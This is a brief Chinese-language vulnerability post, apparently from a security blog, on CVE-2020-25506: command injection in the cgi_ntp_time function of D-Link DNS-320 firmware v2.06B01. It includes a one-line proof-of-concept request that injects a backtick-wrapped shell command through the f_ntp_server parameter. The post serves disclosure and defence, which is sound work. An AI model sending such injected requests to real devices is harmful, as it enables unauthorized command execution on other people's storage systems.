D-LInk DNS320 FW v2.06B01 命令注入(CVE-2020-25506)

# D-LInk DNS320 FW v2.06B01 命令注入(CVE-2020-25506)

固件版本为v2.06B01(ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DNS-320/REVA/DNS-320_REVA_FIRMWARE_v2.06B01.zip)

‘cgi_ntp_time’函数中存在命令注入。’v6’的值与“(sntp-r%s> / dev / null”)拼接,然后传递到系统中执行

PoC:

“`
/cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`id`
“`

ref:

* https://nvd.nist.gov/vuln/detail/CVE-2020-25506
* https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容